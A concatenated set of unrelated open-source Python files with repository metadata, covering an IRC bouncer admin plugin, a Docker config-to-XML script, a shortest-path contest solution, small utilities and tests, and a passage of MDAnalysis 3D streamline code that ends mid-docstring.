@param ip_matcher: a compiled ip_group produced by ip_matcher_builder
@return: True if ip matches, False otherwise
"""
return _mkip(ip) & ip_matcher[1] == ip_matcher[0]
| pombredanne/invenio | modules/webaccess/lib/access_control_firerole.py | Python | gpl-2.0 | 15,550 |
import sys
import math
# dataset_3363_3
name = input().strip() + ".txt"
lines = ''
with open(name, 'r') as r:
for line in r:
lines += line.strip() + " "
string = [i.lower() for i in lines.split()]
from collections import Counter
result = Counter(string).most_common(1)[0]
#print(result)
output = "output_2.txt"
with open(output, 'w') as out:
out.write("{} {}\n".format(result[0], result[1]))
| nizhikebinesi/code_problems_python | stepik/programming_on_python/3.4/task_2.py | Python | gpl-2.0 | 417 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# @Author: Adrien Chardon
# @Date: 2014-11-16 14:29:10
# @Last Modified by: Adrien Chardon
# @Last Modified time: 2014-11-16 16:31:32
import time as t
################################################################################
# Usefull functions
################################################################################
# big number
infinity = 1000
# wrapper
def getObjectInList(nodes, id):
return nodes[id-1]
# Return all childs nodes that can be directly accessed from the node
def getChildOfNode(data, node):
ret = []
for dic in data:
if dic['start'] == node:
ret.append(dic['end'])
return ret
# return the time for traveling directly from node1 to node 2
def getDist(data, node1, node2):
for dic in data:
if (dic['start'] == node1) and (dic['end'] == node2):
return dic['time']
return infinity
################################################################################
# main
################################################################################
# get the time for one request
def expert_itinerant_one(nb_node, nb_link, nb_request, data, start, end):
nodes = []
for _ in range(nb_node):
tmp = {
'distanceFromStart': infinity,
'origin': -1,
}
nodes.append(tmp)
getObjectInList(nodes, start)['distanceFromStart'] = 0
getObjectInList(nodes, start)['origin'] = 0
notVisited = [start]
while notVisited != []:
cur_id = notVisited.pop()
cur = getObjectInList(nodes, cur_id)
for child_id in getChildOfNode(data, cur_id):
child = getObjectInList(nodes, child_id)
if (child['origin'] == -1) or (cur['distanceFromStart'] + getDist(data, cur_id, child_id) < child['distanceFromStart']):
child['distanceFromStart'] = cur['distanceFromStart'] + getDist(data, cur_id, child_id)
child['origin'] = cur_id
if child_id not in notVisited:
notVisited.append(child_id)
return getObjectInList(nodes, end)['distanceFromStart']
def expert_itinerant(nb_node, nb_link, nb_request, data, request):
for dic in request:
print expert_itinerant_one(nb_node, nb_link, nb_request, data, dic['start'], dic['end'])
if __name__ == '__main__':
nb_node, nb_link, nb_request = (int(i) for i in raw_input().split())
data = []
for _ in range(nb_link):
start, end, time = (int(i) for i in raw_input().split())
tmp = {
'start': start,
'end': end,
'time': time,
}
data.append(tmp)
data.sort(key=lambda tup: tup['start'])
request = []
for _ in range(nb_request):
start, end = (int(i) for i in raw_input().split())
tmp = {
'start': start,
'end': end,
}
request.append(tmp)
expert_itinerant(nb_node, nb_link, nb_request, data, request)
| Nodraak/Prologin2015 | 4_Expert-itinerant.py | Python | gpl-2.0 | 3,054 |
#!/usr/bin/env python2
# -*- coding: iso-8859-1 -*-
# WebKOM - a web based LysKOM client
#
# Copyright (C) 2000 by Peter Åstrand
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2
# of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from webkom_constants import VERSION
template = open("webkom.spec.template")
new = open("webkom.spec", "w")
while 1:
line = template.readline()
if not line:
break
if line.find("Version:") != -1:
line = "Version: " + VERSION + "\n"
new.write(line)
| astrand/webkom | set_version.py | Python | gpl-2.0 | 1,081 |
# sbncng - an object-oriented framework for IRC
# Copyright (C) 2011 Gunnar Beutner
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import string
import random
from sbnc.proxy import Proxy
from sbnc.plugin import Plugin, ServiceRegistry
from plugins.ui import UIPlugin, UIAccessCheck
proxy_svc = ServiceRegistry.get(Proxy.package)
ui_svc = ServiceRegistry.get(UIPlugin.package)
class AdminCommandPlugin(Plugin):
"""Implements basic admin commands."""
package = 'info.shroudbnc.plugins.admincmd'
name = "AdminCmd"
description = __doc__
def __init__(self):
ui_svc.register_command('adduser', self._cmd_adduser_handler, 'Admin', 'creates a new user',
'Syntax: adduser <username> [password]\nCreates a new user.', UIAccessCheck.admin)
ui_svc.register_command('admin', self._cmd_admin_handler, 'Admin', 'gives someone admin privileges',
'Syntax: admin <username>\nGives admin privileges to a user.', UIAccessCheck.admin)
ui_svc.register_command('broadcast', self._cmd_broadcast_handler, 'Admin', 'sends a global notice to all bouncer users',
'Syntax: broadcast <text>\nSends a notice to all currently connected users.', UIAccessCheck.admin)
ui_svc.register_command('deluser', self._cmd_deluser_handler, 'Admin', 'removes a user',
'Syntax: deluser <username>\nDeletes a user.', UIAccessCheck.admin)
ui_svc.register_command('die', self._cmd_die_handler, 'Admin', 'terminates the bouncer',
'Syntax: die\nTerminates the bouncer.', UIAccessCheck.admin)
ui_svc.register_command('resetpass', self._cmd_resetpass_handler, 'Admin', 'sets a user\'s password',
'Syntax: resetpass <user> <password>\nResets another user\'s password.', UIAccessCheck.admin)
ui_svc.register_command('simul', self._cmd_simul_handler, 'Admin', 'simulates a command on another user\'s connection',
'Syntax: simul <username> <command>\nExecutes a command in another user\'s context.', UIAccessCheck.admin)
ui_svc.register_command('suspend', self._cmd_suspend_handler, 'Admin', 'suspends a user',
'Syntax: suspend <username> [reason]\nSuspends an account. An optional reason can be specified.', UIAccessCheck.admin)
ui_svc.register_command('unadmin', self._cmd_unadmin_handler, 'Admin', 'removes someone\'s admin privileges',
'Syntax: unadmin <username>\nRemoves someone\'s admin privileges.', UIAccessCheck.admin)
ui_svc.register_command('unsuspend', self._cmd_unsuspend_handler, 'Admin', 'unsuspends a user',
'Syntax: unsuspend <username>\nRemoves a suspension from the specified account.', UIAccessCheck.admin)
ui_svc.register_command('who', self._cmd_who_handler, 'Admin', 'shows users',
'Syntax: who\nShows a list of all users.', UIAccessCheck.admin)
@staticmethod
def _random_password(length = 12):
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
def _cmd_adduser_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: adduser <username> [password]', notice)
return
user = params[0]
if len(params) >= 2:
password = params[1]
else:
password = AdminCommandPlugin._random_password()
if user in proxy_svc.users:
ui_svc.send_sbnc_reply(clientobj, 'The specified username is already in use.', notice)
return
userobj = proxy_svc.create_user(user)
userobj.password = password
if len(params) >= 2:
ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
else:
ui_svc.send_sbnc_reply(clientobj, 'Done.' +
' The new user\'s password is \'%s\'.' % (password), notice)
def _cmd_admin_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: admin <username>', notice)
return
user = params[0]
if not user in proxy_svc.users:
ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
return
userobj = proxy_svc.users[user]
userobj.admin = True
ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
def broadcast(self, message):
for userobj in proxy_svc.users.values():
for subclientobj in userobj.client_connections:
ui_svc.send_sbnc_reply(subclientobj, 'Global message: %s' % (message), notice=False)
def _cmd_broadcast_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: broadcast <text>', notice)
return
self.broadcast(' '.join(params))
ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
pass
def _cmd_deluser_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: deluser <username>', notice)
return
user = params[0]
if not user in proxy_svc.users:
ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
return
proxy_svc.remove_user(user)
ui_svc.send_sbnc_reply(clientobj, 'Done.')
def _cmd_die_handler(self, clientobj, params, notice):
# TODO: implement
pass
def _cmd_resetpass_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: resetpass <username> [password]', notice)
return
user = params[0]
if not user in proxy_svc.users:
ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
return
if len(params) >= 2:
password = params[1]
else:
password = AdminCommandPlugin._random_password()
userobj = proxy_svc.users[user]
userobj.password = password
if len(params) >= 2:
ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
else:
ui_svc.send_sbnc_reply(clientobj, 'Done.' +
' The user\'s password was changed to \'%s\'.' % (password), notice)
def _cmd_simul_handler(self, clientobj, params, notice):
if len(params) < 2:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: simul <username> <command>', notice)
return
# TODO: implement
pass
def _cmd_suspend_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: suspend <username> [reason]', notice)
return
# TODO: implement
pass
def _cmd_unadmin_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: unadmin <username>', notice)
return
user = params[0]
if not user in proxy_svc.users:
ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
return
userobj = proxy_svc.users[user]
userobj.admin = False
ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
def _cmd_unsuspend_handler(self, clientobj, params, notice):
if len(params) < 1:
ui_svc.send_sbnc_reply(clientobj, 'Syntax: unsuspend <username>', notice)
return
# TODO: implement
pass
def _cmd_who_handler(self, clientobj, params, notice):
# TODO: implement
pass
ServiceRegistry.register(AdminCommandPlugin)
| gunnarbeutner/sbncng | src/plugins/admincmd.py | Python | gpl-2.0 | 8,968 |
#!/usr/bin/python
import os
from AhsayTools import XmlConf, env_true, env_false
# Map Enviroment Variables to server.xml > Xpath > attibute
server_conf = XmlConf("/rdr/conf/server.xml")
server_conf.set_attrib("Service/Connector", "port", "RDR_HTTP_PORT")
server_conf.set_attrib("Service/Connector[@scheme='https']", "port",
"RDR_HTTPS_PORT")
server_conf.set_attrib("Service/Connector[@scheme='https']", "keystoreFile",
"RDR_KEYSTORE_FILE")
server_conf.set_attrib("Service/Connector[@scheme='https']", "keystorePass",
"RDR_KEYSTORE_PASSWORD")
server_conf.set_attrib("Service/Connector[@scheme='https']",
"sslEnabledProtocols", "RDR_PROTOCOLS")
# If true, tomcat will trust the X-Forwarded-For header from IPs that match
# proxies
if "RDR_PROXIED" in os.environ:
parent_xpath = "Service/Engine/Host"
elem = "Valve"
attr_key = "className"
attr_val = "org.apache.catalina.valves.RemoteIpValve"
xpath = '%s/%s[@%s="%s"]' % (parent_xpath, elem, attr_key, attr_val)
internal_proxies = ("172.1[6-9]\.\d+\.\d+, "
"172.2[0-9]\.\d+\.\d+, "
"172.3[0-1]\.\d+\.\d+")
if env_true("RDR_PROXIED"):
if server_conf.find(xpath) is None:
server_conf.subelement(parent_xpath, elem, {attr_key: attr_val,
"internalProxies": internal_proxies})
if env_false("RDR_PROXIED"):
if server_conf.find(xpath) is not None:
server_conf.remove(parent_xpath, elem, {attr_key: attr_val})
server_conf.write()
# Map Enviroment Variables to obs.xml > Xpath > attibute
rdr_conf = XmlConf("/rdr/conf/rdr.xml")
rdr_conf.set_attrib(
"Key[@name='com.ahsay.rdr.core.key.rdr.Rdr']/Value[@name='rsv-login-name']",
"data", "RDR_USERNAME")
rdr_conf.set_attrib(
"Key[@name='com.ahsay.rdr.core.key.rdr.Rdr']/Value[@name='rsv-password']",
"data", "RDR_PASSWORD")
rdr_conf.set_attrib(
"Key[@name='com.ahsay.rdr.core.key.rdr.Rdr']/Value[@name='rsv-hashed-password']",
"data", "RDR_PASSWORD_HASHED")
rdr_conf.set_attrib(
"Key[@name='com.ahsay.rdr.core.key.rdr.Rdr']/Key[@name='com.ahsay.rdr.core.key.rdr.License']/Value[@name='rsv-licensee-name']", "data", "RDR_LICENSE_NAME")
rdr_conf.set_attrib(
"Key[@name='com.ahsay.rdr.core.key.rdr.Rdr']/Key[@name='com.ahsay.rdr.core.key.rdr.License']/Value[@name='rsv-license-key']",
"data", "RDR_LICENSE_KEY")
rdr_conf.write()
# Enforce SSL on /obs/jsp/user/* and /obs/jsp/system/*
if "RDR_ENFORCE_SSL" in os.environ:
namespace = "http://java.sun.com/xml/ns/j2ee"
elem = "security-constraint"
xpath = '{%s}%s' % (namespace, elem)
rdr_web = XmlConf("/rdr/webapps/rdr/WEB-INF/web.xml", {'': namespace})
if env_true("RDR_ENFORCE_SSL"):
if rdr_web.find(xpath) is None:
rdr_web.subelement('.', elem)
rdr_web.subelement(elem, 'web-resource-collection')
web_resource_name = rdr_web.subelement(
'%s/web-resource-collection' % elem,
'web-resource-name')
web_resource_name.text = 'Automatic SSL Forwarding'
url_pattern = rdr_web.subelement(
'%s/web-resource-collection' % elem,
'url-pattern')
url_pattern.text = '/jsp/user/*'
url_pattern2 = rdr_web.subelement(
'%s/web-resource-collection' % elem,
'url-pattern')
url_pattern2.text = '/jsp/system/*'
user_data_constraint = rdr_web.subelement(
'%s' % elem,
'user-data-constraint')
transport_guarantee = rdr_web.subelement(
'%s/user-data-constraint' % elem,
'transport-guarantee')
transport_guarantee.text = 'CONFIDENTIAL'
if env_false("RDR_ENFORCE_SSL"):
if rdr_web.find(xpath) is not None:
rdr_web.remove('.', xpath)
rdr_web.write()
# Enforce SSL on /obs/jsp/user/* and /obs/jsp/system/*
if "ROOT_ENFORCE_SSL" in os.environ:
namespace = "http://java.sun.com/xml/ns/j2ee"
elem = "security-constraint"
xpath = '%s' % (elem)
root_web = XmlConf("/rdr/webapps/ROOT/WEB-INF/web.xml")
if env_true("ROOT_ENFORCE_SSL"):
if root_web.find(xpath) is None:
root_web.subelement('.', elem)
root_web.subelement(elem, 'web-resource-collection')
web_resource_name = root_web.subelement(
'%s/web-resource-collection' % elem,
'web-resource-name')
web_resource_name.text = 'Automatic SSL Forwarding'
url_pattern = root_web.subelement(
'%s/web-resource-collection' % elem,
'url-pattern')
url_pattern.text = '/*'
user_data_constraint = root_web.subelement(
'%s' % elem,
'user-data-constraint')
transport_guarantee = root_web.subelement(
'%s/user-data-constraint' % elem,
'transport-guarantee')
transport_guarantee.text = 'CONFIDENTIAL'
if env_false("ROOT_ENFORCE_SSL"):
if root_web.find(xpath) is not None:
root_web.remove('.', xpath)
root_web.write()
| jeffre/docker-rdr | bootstrap/env_to_xml.py | Python | gpl-2.0 | 5,303 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"Fully test this module's functionality through the use of fixtures."
from megacosm.generators import Gem
import unittest2 as unittest
import fakeredis
from config import TestConfiguration
import fixtures
class TestGem(unittest.TestCase):
def setUp(self):
""" """
self.redis = fakeredis.FakeRedis()
fixtures.gem.import_fixtures(self)
def tearDown(self):
self.redis.flushall()
def test_random_gem(self):
""" """
gem = Gem(self.redis)
self.assertNotEquals('', gem.text)
self.assertNotEquals('', gem.count)
self.assertNotEquals('', gem.color)
self.assertNotEquals('', str(gem))
def test_static_gem(self):
""" """
gem = Gem(self.redis, {'text':'foo bar', 'count':3, 'color':'green'})
self.assertEqual('Foo bar', gem.text)
self.assertEqual(3, gem.count)
self.assertEqual('green', gem.color)
| CityGenerator/Megacosm-Generator | tests/test_gem.py | Python | gpl-2.0 | 980 |
#!python2.7
'''
Created on Jul 13, 2014
@author: cilia
'''
import os.path
import os
import time
import sys
import tempfile
from utils.path import loadModule
import utils
conf = utils.get_conf()
def run_task(task_conf):
# import pdb; pdb.set_trace()
print 'run task:', task_conf['task name']
task_func = loadModule(task_conf['task method'])
task_param = eval(task_conf['task parameters'])
task_func(**task_param)
def main(argv):
task_conf_name = argv[0]
if os.path.exists(task_conf_name):
task_confs = eval(open(task_conf_name).read())
else:
task_conf_name += '%s%s%s' % (os.path.dirname(__file__), '../conf/', task_conf_name)
if os.path.exists(task_conf_name):
task_confs = eval(open(task_conf_name))
else:
print 'task configuration file does not exist'
sys.exit(3)
for task_conf in task_confs:
run_task(task_conf)
if not conf['debug']:
'clean cache files'
cache_path = tempfile.gettempdir()
file_names = [file_name for file_name in os.listdir(cache_path) if file_name.startswith('rupee.cache')]
for file_name in file_names:
print 'remove file:', cache_path+'/'+file_name
os.remove(cache_path+'/'+file_name)
if __name__ == '__main__':
main(sys.argv[1:])
| XiaoLiuAI/RUPEE | src/python/main.py | Python | gpl-2.0 | 1,335 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
'''
Multicore 3D streamplot Python library for MDAnalysis --- :mod:`MDAnalysis.visualization.streamlines_3D`
=========================================================================================================
:Authors: Tyler Reddy and Matthieu Chavent
:Year: 2014
:Copyright: GNU Public License v3
:Citation: [Chavent2014]_
.. autofunction:: generate_streamlines_3d
'''
from __future__ import division, absolute_import
import six
from six.moves import range
import MDAnalysis
import multiprocessing
import numpy as np
import numpy.testing
import scipy
import scipy.spatial.distance
def determine_container_limits(coordinate_file_path, trajectory_file_path, buffer_value):
'''A function for the parent process which should take the input trajectory and calculate the limits of the
container for the system and return these limits.'''
universe_object = MDAnalysis.Universe(coordinate_file_path, trajectory_file_path)
all_atom_selection = universe_object.select_atoms('all') # select all particles
all_atom_coordinate_array = all_atom_selection.positions
x_min, x_max, y_min, y_max, z_min, z_max = [
all_atom_coordinate_array[..., 0].min(),
all_atom_coordinate_array[..., 0].max(), all_atom_coordinate_array[..., 1].min(),
all_atom_coordinate_array[..., 1].max(), all_atom_coordinate_array[..., 2].min(),
all_atom_coordinate_array[..., 2].max()]
tuple_of_limits = \
(
x_min - buffer_value,
x_max + buffer_value, y_min - buffer_value, y_max + buffer_value, z_min - buffer_value,
z_max + buffer_value) # using buffer_value to catch particles near edges
return tuple_of_limits
def produce_grid(tuple_of_limits, grid_spacing):
'''Produce a grid for the simulation system based on the tuple of Cartesian Coordinate limits calculated in an
earlier step.'''
x_min, x_max, y_min, y_max, z_min, z_max = tuple_of_limits
grid = np.mgrid[x_min:x_max:grid_spacing, y_min:y_max:grid_spacing, z_min:z_max:grid_spacing]
return grid
def split_grid(grid, num_cores):
'''Take the overall grid for the system and split it into lists of cube vertices that can be distributed to each
core.'''
# unpack the x,y,z mgrid arrays
x, y, z = grid
num_z_values = z.shape[-1]
num_sheets = z.shape[0]
delta_array_shape = tuple(
[n - 1 for n in x.shape]) # the final target shape for return delta arrays is n-1 in each dimension
ordered_list_per_sheet_x_values = []
for x_sheet in x: # each x_sheet should have shape (25,23) and the same x value in each element
array_all_x_values_current_sheet = x_sheet.flatten()
ordered_list_per_sheet_x_values.append(array_all_x_values_current_sheet)
ordered_list_per_sheet_y_values = []
for y_columns in y:
array_all_y_values_current_sheet = y_columns.flatten()
ordered_list_per_sheet_y_values.append(array_all_y_values_current_sheet)
ordered_list_per_sheet_z_values = []
for z_slices in z:
array_all_z_values_current_sheet = z_slices.flatten()
ordered_list_per_sheet_z_values.append(array_all_z_values_current_sheet)
ordered_list_cartesian_coordinates_per_sheet = []
for x_sheet_coords, y_sheet_coords, z_sheet_coords in zip(ordered_list_per_sheet_x_values,
ordered_list_per_sheet_y_values,
ordered_list_per_sheet_z_values):
ordered_list_cartesian_coordinates_per_sheet.append(zip(x_sheet_coords, y_sheet_coords, z_sheet_coords))
array_ordered_cartesian_coords_per_sheet = np.array(ordered_list_cartesian_coordinates_per_sheet)
#now I'm going to want to build cubes in an ordered fashion, and in such a way that I can track the index /
# centroid of each cube for domain decomposition / reconstruction and mayavi mlab.flow() input
#cubes will be formed from N - 1 base sheets combined with subsequent sheets
current_base_sheet = 0
dictionary_cubes_centroids_indices = {}
cube_counter = 0
while current_base_sheet < num_sheets - 1:
current_base_sheet_array = array_ordered_cartesian_coords_per_sheet[current_base_sheet]
current_top_sheet_array = array_ordered_cartesian_coords_per_sheet[
current_base_sheet + 1] # the points of the sheet 'to the right' in the grid
current_index = 0
while current_index < current_base_sheet_array.shape[0] - num_z_values:
# iterate through all the indices in each of the sheet arrays (careful to avoid extra
# points not needed for cubes)
column_z_level = 0 # start at the bottom of a given 4-point column and work up
while column_z_level < num_z_values - 1:
current_list_cube_vertices = []
first_two_vertices_base_sheet = current_base_sheet_array[current_index:current_index + 2, ...].tolist()
first_two_vertices_top_sheet = current_top_sheet_array[current_index:current_index + 2, ...].tolist()
next_two_vertices_base_sheet = current_base_sheet_array[current_index +
num_z_values: 2 +
num_z_values + current_index, ...].tolist()
next_two_vertices_top_sheet = current_top_sheet_array[current_index +
num_z_values: 2 +
num_z_values + current_index, ...].tolist()
for vertex_set in [
first_two_vertices_base_sheet, first_two_vertices_top_sheet,
next_two_vertices_base_sheet, next_two_vertices_top_sheet
]:
current_list_cube_vertices.extend(vertex_set)
vertex_array = np.array(current_list_cube_vertices)
assert vertex_array.shape == (8, 3), "vertex_array has incorrect shape"
cube_centroid = np.average(np.array(current_list_cube_vertices), axis=0)
dictionary_cubes_centroids_indices[cube_counter] = {
'centroid': cube_centroid,
'vertex_list': current_list_cube_vertices}
cube_counter += 1
current_index += 1
column_z_level += 1
if column_z_level == num_z_values - 1: # the loop will break but I should also increment the
# current_index
current_index += 1
current_base_sheet += 1
total_cubes = len(dictionary_cubes_centroids_indices)
#produce an array of pseudo cube indices (actually the dictionary keys which are cube numbers in string format):
pseudo_cube_indices = np.arange(0, total_cubes)
sublist_of_cube_indices_per_core = np.array_split(pseudo_cube_indices, num_cores)
#now, the split of pseudoindices seems to work well, and the above sublist_of_cube_indices_per_core is a list of
# arrays of cube numbers / keys in the original dictionary
#now I think I'll try to produce a list of dictionaries that each contain their assigned cubes based on the above
# per core split
list_dictionaries_for_cores = []
subdictionary_counter = 0
for array_cube_indices in sublist_of_cube_indices_per_core:
current_core_dictionary = {}
items_to_pop = len(array_cube_indices)
items_popped = 0
while items_popped < items_to_pop:
key, value = dictionary_cubes_centroids_indices.popitem()
current_core_dictionary.update({key: value})
items_popped += 1
list_dictionaries_for_cores.append(current_core_dictionary)
subdictionary_counter += 1
return list_dictionaries_for_cores, total_cubes, num_sheets, delta_array_shape
def per_core_work(start_frame_coord_array, end_frame_coord_array, dictionary_cube_data_this_core, MDA_selection,
start_frame, end_frame):
'''The code to perform on a given core given the dictionary of cube data.'''
list_previous_frame_centroids = []
list_previous_frame_indices = []
# define some utility functions for trajectory iteration:
def point_in_cube(array_point_coordinates, list_cube_vertices, cube_centroid):
'''Determine if an array of coordinates are within a cube.'''
#the simulation particle point can't be more than half the cube side length away from the cube centroid in
# any given dimension:
array_cube_vertices = np.array(list_cube_vertices)
cube_half_side_length = scipy.spatial.distance.pdist(array_cube_vertices, 'euclidean').min() / 2.0
array_cube_vertex_distances_from_centroid = scipy.spatial.distance.cdist(array_cube_vertices,
cube_centroid[np.newaxis, :])
np.testing.assert_almost_equal(array_cube_vertex_distances_from_centroid.min(),
array_cube_vertex_distances_from_centroid.max(), decimal=4,
err_msg="not all cube vertex to centroid distances are the same, "
"so not a true cube")
absolute_delta_coords = np.absolute(np.subtract(array_point_coordinates, cube_centroid))
absolute_delta_x_coords = absolute_delta_coords[..., 0]
indices_delta_x_acceptable = np.where(absolute_delta_x_coords <= cube_half_side_length)
absolute_delta_y_coords = absolute_delta_coords[..., 1]
indices_delta_y_acceptable = np.where(absolute_delta_y_coords <= cube_half_side_length)
absolute_delta_z_coords = absolute_delta_coords[..., 2]
indices_delta_z_acceptable = np.where(absolute_delta_z_coords <= cube_half_side_length)
intersection_xy_acceptable_arrays = np.intersect1d(indices_delta_x_acceptable[0],
indices_delta_y_acceptable[0])
overall_indices_points_in_current_cube = np.intersect1d(intersection_xy_acceptable_arrays,
indices_delta_z_acceptable[0])
return overall_indices_points_in_current_cube
def update_dictionary_point_in_cube_start_frame(array_simulation_particle_coordinates,
dictionary_cube_data_this_core):
'''Basically update the cube dictionary objects assigned to this core to contain a new key/value pair
corresponding to the indices of the relevant particles that fall within a given cube. Also, for a given cube,
store a key/value pair for the centroid of the particles that fall within the cube.'''
cube_counter = 0
for key, cube in six.iteritems(dictionary_cube_data_this_core):
index_list_in_cube = point_in_cube(array_simulation_particle_coordinates, cube['vertex_list'],
cube['centroid'])
cube['start_frame_index_list_in_cube'] = index_list_in_cube
if len(index_list_in_cube) > 0: # if there's at least one particle in this cube
centroid_particles_in_cube = np.average(array_simulation_particle_coordinates[index_list_in_cube],
axis=0)
cube['centroid_of_particles_first_frame'] = centroid_particles_in_cube
else: # empty cube
cube['centroid_of_particles_first_frame'] = 'empty'
cube_counter += 1
def update_dictionary_end_frame(array_simulation_particle_coordinates, dictionary_cube_data_this_core):
'''Update the cube dictionary objects again as appropriate for the second and final frame.'''
cube_counter = 0
for key, cube in six.iteritems(dictionary_cube_data_this_core):
# if there were no particles in the cube in the first frame, then set dx,dy,dz each to 0
if cube['centroid_of_particles_first_frame'] == 'empty':
cube['dx'] = 0
cube['dy'] = 0
cube['dz'] = 0
else: # there was at least one particle in the starting cube so we can get dx,dy,dz centroid values
new_coordinate_array_for_particles_starting_in_this_cube = array_simulation_particle_coordinates[
cube['start_frame_index_list_in_cube']]
new_centroid_for_particles_starting_in_this_cube = np.average(
new_coordinate_array_for_particles_starting_in_this_cube, axis=0)
cube['centroid_of_paticles_final_frame'] = new_centroid_for_particles_starting_in_this_cube
delta_centroid_array_this_cube = new_centroid_for_particles_starting_in_this_cube - cube[
'centroid_of_particles_first_frame']
cube['dx'] = delta_centroid_array_this_cube[0]
cube['dy'] = delta_centroid_array_this_cube[1]
cube['dz'] = delta_centroid_array_this_cube[2]
cube_counter += 1
#now that the parent process is dealing with the universe object & grabbing required coordinates, each child
# process only needs to take the coordinate arrays & perform the operations with its assigned cubes (no more file
# opening and trajectory iteration on each core--which I'm hoping will substantially reduce the physical memory
# footprint of my 3D streamplot code)
update_dictionary_point_in_cube_start_frame(start_frame_coord_array, dictionary_cube_data_this_core)
update_dictionary_end_frame(end_frame_coord_array, dictionary_cube_data_this_core)
return dictionary_cube_data_this_core
def produce_coordinate_arrays_single_process(coordinate_file_path, trajectory_file_path, MDA_selection, start_frame,
end_frame):
'''To reduce memory footprint produce only a single MDA selection and get desired coordinate arrays; can later
send these coordinate arrays to all child processes rather than having each child process open a trajectoryand
waste memory.'''
universe_object = MDAnalysis.Universe(coordinate_file_path, trajectory_file_path)
relevant_particles = universe_object.select_atoms(MDA_selection)
# pull out coordinate arrays from desired frames:
for ts in universe_object.trajectory:
if ts.frame > end_frame:
break # stop here
if ts.frame == start_frame:
start_frame_relevant_particle_coordinate_array_xyz = relevant_particles.positions
elif ts.frame == end_frame:
end_frame_relevant_particle_coordinate_array_xyz = relevant_particles.positions
else:
continue
return (start_frame_relevant_particle_coordinate_array_xyz, end_frame_relevant_particle_coordinate_array_xyz)
def generate_streamlines_3d(coordinate_file_path, trajectory_file_path, grid_spacing, MDA_selection, start_frame,
end_frame, xmin, xmax, ymin, ymax, zmin, zmax, maximum_delta_magnitude=2.0,
num_cores='maximum'):
'''Produce the x, y and z components of a 3D streamplot data set.
:Parameters:
**coordinate_file_path** : str
Absolute path to the coordinate file
**trajectory_file_path** : str
Absolute path to the trajectory file. It will normally be desirable to filter the trajectory with a tool
such as GROMACS g_filter (see [Chavent2014]_)
**grid_spacing** : float
The spacing between grid lines (angstroms)
**MDA_selection** : str
MDAnalysis selection string
**start_frame** : int
First frame number to parse
**end_frame** : int
Last frame number to parse
**xmin** : float
Minimum coordinate boundary for x-axis (angstroms)
**xmax** : float
Maximum coordinate boundary for x-axis (angstroms)
**ymin** : float
Minimum coordinate boundary for y-axis (angstroms)
**ymax** : float
Maximum coordinate boundary for y-axis (angstroms)
**zmin** : float
Minimum coordinate boundary for z-axis (angstroms)
**zmax** : float
Maximum coordinate boundary for z-axis (angstroms)
**maximum_delta_magnitude** : float
Absolute value of the largest displacement (in dx,dy, or dz) tolerated for the centroid of a group of
particles (angstroms; default: 2.0). Values above this displacement will not count in the streamplot (
treated as excessively large displacements crossing the periodic boundary)
**num_cores** : int, optional
The number of cores to use. (Default 'maximum' uses all available cores)
:Returns:
**dx_array** : array of floats
An array object containing the displacements in the x direction
**dy_array** : array of floats
An array object containing the displacements in the y direction
**dz_array** : array of floats
An array object containing the displacements in the z direction
:Examples:
::
import np as np
import MDAnalysis
import MDAnalysis.visualization.streamlines_3D
